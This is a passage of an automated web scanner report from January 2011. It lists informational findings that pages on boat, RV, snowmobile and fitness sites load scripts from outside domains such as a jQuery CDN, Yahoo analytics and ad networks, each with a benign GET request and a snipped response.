<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>RV Resources - RVTraderOnline.com</title>
   <meta name="description" content="Find crit
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo tracking Code -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.1243. http://www.rvtraderonline.com/sell/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rvtraderonline.com
Path:   /sell/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET /sell/ HTTP/1.1
Host: www.rvtraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:09:10 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 23177


<!-- dstolweb06-php5a -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Sell your RV on RV Trader</title>
   <meta name="description" content="Sell your new or
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo tracking Code -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.1244. http://www.sailinganarchy.com/ADs/nauticexpo/nauticexpo.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sailinganarchy.com
Path:   /ADs/nauticexpo/nauticexpo.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://static.nauticexpo.com/static/js/fenetre.class.m.cdn12.js
  • http://static.nauticexpo.com/static/js/lightbox.m.cdn10.js
  • http://static.nauticexpo.com/static/js/societe.m.cdn15.js

Request

GET /ADs/nauticexpo/nauticexpo.htm HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:42 GMT
Server: Apache
Last-Modified: Thu, 19 Nov 2009 23:43:14 GMT
ETag: "34a303-85e6-ec38a880"
Accept-Ranges: bytes
Content-Length: 34278
Vary: User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>
Sailboats, Catamarans, Sailing dinghies, Mainsails, Drysuits - NauticExpo </title>

...[SNIP]...
<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/lightbox.m.cdn10.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/fenetre.class.m.cdn12.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/societe.m.cdn15.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/lightbox.m.cdn10.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/fenetre.class.m.cdn12.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/societe.m.cdn15.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/lightbox.m.cdn10.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/fenetre.class.m.cdn12.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/societe.m.cdn15.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/lightbox.m.cdn10.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/fenetre.class.m.cdn12.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/societe.m.cdn15.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/lightbox.m.cdn10.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/fenetre.class.m.cdn12.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/societe.m.cdn15.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/lightbox.m.cdn10.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/fenetre.class.m.cdn12.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/societe.m.cdn15.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/lightbox.m.cdn10.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/fenetre.class.m.cdn12.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/societe.m.cdn15.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/lightbox.m.cdn10.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/fenetre.class.m.cdn12.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/societe.m.cdn15.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/lightbox.m.cdn10.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/fenetre.class.m.cdn12.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/societe.m.cdn15.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/lightbox.m.cdn10.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/fenetre.class.m.cdn12.js" type="text/javascript"></script>

<!-- Script Files -->
<script src="http://static.nauticexpo.com/static/js/societe.m.cdn15.js" type="text/javascript"></script>
...[SNIP]...

21.1245. http://www.sailinganarchy.com/breymaiersailing.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sailinganarchy.com
Path:   /breymaiersailing.com

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /breymaiersailing.com HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:28:42 GMT
Server: Apache
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 1984


<html>
<head>
<title>NetHere: URL Not Found (404)</title>
<link rev="made" href="mailto:webmaster@sailinganarchy.com">
<style>
a:link {
color : #092769;
}
a:visited {
color : #092769;

...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1246. http://www.sailinganarchy.com/calendar/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sailinganarchy.com
Path:   /calendar/index.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.afy11.net/srad.js?azId=1000000238007
  • http://ad.afy11.net/srad.js?azId=1000000238307
  • http://edge.quantserve.com/quant.js

Request

GET /calendar/index.php HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:42 GMT
Server: Apache
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 67338

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
</script>
       <script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=1000000238307">
       </script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://ad.afy11.net/srad.js?azId=1000000238007">

</script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.1247. http://www.sailinganarchy.com/editor/audio_video.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sailinganarchy.com
Path:   /editor/audio_video.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://ad.afy11.net/srad.js?azId=1000000238307

Request

GET /editor/audio_video.php HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:43 GMT
Server: Apache
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 122549

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Sailin News and
...[SNIP]...
</script>
       <script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=1000000238307">
       </script>
...[SNIP]...

21.1248. http://www.sailinganarchy.com/editor/pimpin.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sailinganarchy.com
Path:   /editor/pimpin.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://ad.afy11.net/srad.js?azId=1000000238307

Request

GET /editor/pimpin.php HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:44 GMT
Server: Apache
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 70163

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Sailin News and
...[SNIP]...
</script>
       <script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=1000000238307">
       </script>
...[SNIP]...

21.1249. http://www.sailinganarchy.com/index_page1.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sailinganarchy.com
Path:   /index_page1.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.afy11.net/srad.js?azId=1000000238007
  • http://ad.afy11.net/srad.js?azId=1000000238107
  • http://ad.afy11.net/srad.js?azId=1000000238307
  • http://edge.quantserve.com/quant.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /index_page1.php HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:45 GMT
Server: Apache
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 112556

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="ke
...[SNIP]...
</script>
       <script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=1000000238307">
       </script>
...[SNIP]...
</script>
           <script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=1000000238107">
           </script>
...[SNIP]...
</script>
           <script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=1000000238107">
           </script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://ad.afy11.net/srad.js?azId=1000000238007">

</script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.1250. http://www.sailinganarchy.com/index_page2.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sailinganarchy.com
Path:   /index_page2.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.afy11.net/srad.js?azId=1000000238007
  • http://ad.afy11.net/srad.js?azId=1000000238107
  • http://ad.afy11.net/srad.js?azId=1000000238307
  • http://edge.quantserve.com/quant.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /index_page2.php HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:45 GMT
Server: Apache
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 97764

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="ke
...[SNIP]...
</script>
       <script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=1000000238307">
       </script>
...[SNIP]...
</script>
           <script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=1000000238107">
           </script>
...[SNIP]...
</script>
           <script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=1000000238107">
           </script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://ad.afy11.net/srad.js?azId=1000000238007">

</script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.1251. http://www.sailinganarchy.com/none

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sailinganarchy.com
Path:   /none

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /none HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:28:46 GMT
Server: Apache
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 1984


<html>
<head>
<title>NetHere: URL Not Found (404)</title>
<link rev="made" href="mailto:webmaster@sailinganarchy.com">
<style>
a:link {
color : #092769;
}
a:visited {
color : #092769;

...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1252. http://www.shape.com/workouts/articles/blood_sugar.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shape.com
Path:   /workouts/articles/blood_sugar.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js
  • http://serve.a-widget.com/kickFlash/scripts/swfobject2.js

Request

GET /workouts/articles/blood_sugar.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 25 Jan 2011 02:28:50 GMT
Server: Apache
Cache-Control: max-age=900
Location: http://www.shape.com/workouts/articles/blood-sugar.html
X-Server-Name: (null)
ETag: "1295922530"
Last-Modified: Tue, 25 Jan 2011 02:28:50 +0000
X-Powered-By: PHP/5.2.13
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 02:43:49 GMT
Content-Type: text/html; charset=utf-8
Age: 0
Via: 1.1 mdw107101 (MII-APC/1.6)
Connection: close
Content-Length: 27234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
</script>
<script type="text/javascript" src="http://serve.a-widget.com/kickFlash/scripts/swfobject2.js"></script>
...[SNIP]...
<!-- crazy egg -->
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js"> </script>
...[SNIP]...

21.1253. http://www.shape.com/workouts/articles/workout_schedule.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shape.com
Path:   /workouts/articles/workout_schedule.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js
  • http://serve.a-widget.com/kickFlash/scripts/swfobject2.js

Request

GET /workouts/articles/workout_schedule.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 25 Jan 2011 02:28:49 GMT
Server: Apache
Cache-Control: max-age=900
Location: http://www.shape.com/workouts/articles/workout-schedule.html
X-Server-Name: (null)
ETag: "1295922529"
Last-Modified: Tue, 25 Jan 2011 02:28:49 +0000
X-Powered-By: PHP/5.2.13
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 02:43:49 GMT
Content-Type: text/html; charset=utf-8
Age: 0
Via: 1.1 mdw107101 (MII-APC/1.6)
Connection: close
Content-Length: 27239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
</script>
<script type="text/javascript" src="http://serve.a-widget.com/kickFlash/scripts/swfobject2.js"></script>
...[SNIP]...
<!-- crazy egg -->
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js"> </script>
...[SNIP]...

21.1254. http://www.snowmobiletraderonline.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.snowmobiletraderonline.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET / HTTP/1.1
Host: www.snowmobiletraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:09:17 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Set-Cookie: location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Wed, 25-Jan-2012 00:09:18 GMT
Connection: close
Content-Type: text/html
Content-Length: 45649

<!-- dstolweb07-php5b --><!DOCTYPE html>
<html>
<head>
   <title>Snowmobiles for Sale - Arctic Cat, Ski-Doo, and More - SnowmobileTraderOnline.com</title>
   <meta http-equiv="Cache-Control" content="no-c
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.1255. http://www.snowmobiletraderonline.com/find/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.snowmobiletraderonline.com
Path:   /find/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET /find/ HTTP/1.1
Host: www.snowmobiletraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:09:18 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 25143


<!-- dstolweb04-php5a -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Search New and Used Snowmobiles at SnowmobileTraderOnline.com</title>
   <meta name="desc
...[SNIP]...
<![endif]-->
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo tracking Code -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.1256. http://www.snowmobiletraderonline.com/research/resources/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.snowmobiletraderonline.com
Path:   /research/resources/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET /research/resources/ HTTP/1.1
Host: www.snowmobiletraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:09:21 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 21575


<!-- dstolweb10-php5a -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Snowmobile Resources: Finance Insurance and More - SnowmobileTraderOnline.com</title>
   
...[SNIP]...
<![endif]-->
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo tracking Code -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.1257. http://www.snowmobiletraderonline.com/sell/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.snowmobiletraderonline.com
Path:   /sell/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET /sell/ HTTP/1.1
Host: www.snowmobiletraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:09:19 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 26532


<!-- dstolweb11-php5b -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Sell Your New or Used Snowmobile - SnowmobileTraderOnline.com</title>
   <meta name="desc
...[SNIP]...
<![endif]-->
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo tracking Code -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.1258. http://www.soundingsonline.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET / HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 00:09:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=tuebuqj09e756i1v904bm8i7l6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:09:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1259. http://www.soundingsonline.com/about-us

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /about-us

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /about-us HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1260. http://www.soundingsonline.com/advertise

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /advertise

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /advertise HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:30:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:30:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

